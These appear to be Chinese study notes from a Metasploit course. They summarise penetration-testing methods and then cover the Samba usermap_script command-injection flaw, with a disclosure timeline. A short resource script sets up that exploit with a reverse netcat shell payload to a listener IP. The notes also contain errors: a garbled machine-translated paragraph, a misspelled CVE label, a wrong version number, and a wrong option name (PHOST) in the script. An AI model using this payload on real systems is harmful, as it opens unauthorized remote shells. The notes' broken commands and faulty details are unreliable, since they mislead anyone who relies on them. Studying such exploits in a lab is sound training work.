Metasploit渗透测试笔记(一)

小结

  • 渗透测试时一种通过模拟恶意攻击者的技术与方法,挫败目的标系统安全控制措施,取得访问控制权,并发现具备业务影响后果安全隐患的一种安全测试与评估方式。渗透测试具有两种基本类型:黑盒测试与白盒测试,结合两种的称为灰盒测试。
  • 目前业界流行的渗透测试方法学有OSSTMM、NIST SP800-42、OWASP TOP 10、WASC-TC、PTES等。
  • 渗透测试主要包括前期交互、情报搜集、威胁建模、漏洞分析、渗透攻击、后渗透攻击和报告7个阶段。
  • 渗透测试流程中最核心和最基本的内容是找出目标系统中存在的安全漏洞,并实施渗透攻击。
  • Metasploit框架中最重要的是辅助模块、渗透攻击模块、后渗透攻击模块、攻击载荷模块、空指令模块和编码器模块这六类模块组件,提供了多种使用接口和一系列的功能程序,支持与大量第三方安全工具进行集合应用。
  • Metasploit最方便的使用平台是Back Track,功能最强大的使用接口是MSF终端。

实践作业

  1. usermap_script是Samba协议的一个漏洞,ID为CEV-2007-2447,属于远程命令注入漏洞,主要影响Samba的3.020到3.0.25rc3版本。
    这个bug最初是针对匿名电话进行报告的到SamrChangePassword()MS-RPC功能组合中与“用户名映射脚本”smb.conf选项(不是默认启用)。经过Samba开发人员的进一步调查,结果如下确定问题更广泛和影响远程打印机和文件共享管理。根原因是传递通过MS-RPC提供的未经过滤的用户输入在调用定义的外部脚本时调用/ bin / sh。
    在smb.conf中,与“用户名映射脚本”不同,漏洞,远程文件和打印机管理脚本需要经过认证的用户会话。

更深入资料见下面的info
Metasploit渗透测试笔记(一)_第1张图片
漏洞生命周期

  • 2007年5月7日:漏洞匿名披露到[email protected]电子邮件列表中。
  • 2007年5月7日:Samba的开发人员Gerald Carter开始响应这个漏洞。
  • 2007年5月9日:Samba的开发者Jeremy Allison发布了补丁,用于iDefense测试。
  • 2007年5月10日:向vendor-sec邮件列表发布通知。
  • 2007年5月14日:公开漏洞信息。

Metasploit渗透测试笔记(一)_第2张图片
3.

#usermap.rc
use exploit/multi/samba/usermap_script
set payload cmd/unix/reverse_netcat
set PHOST 192.168.1.254
set LHOST 192.168.1.210

Metasploit渗透测试笔记(一)_第3张图片

你可能感兴趣的:(渗透)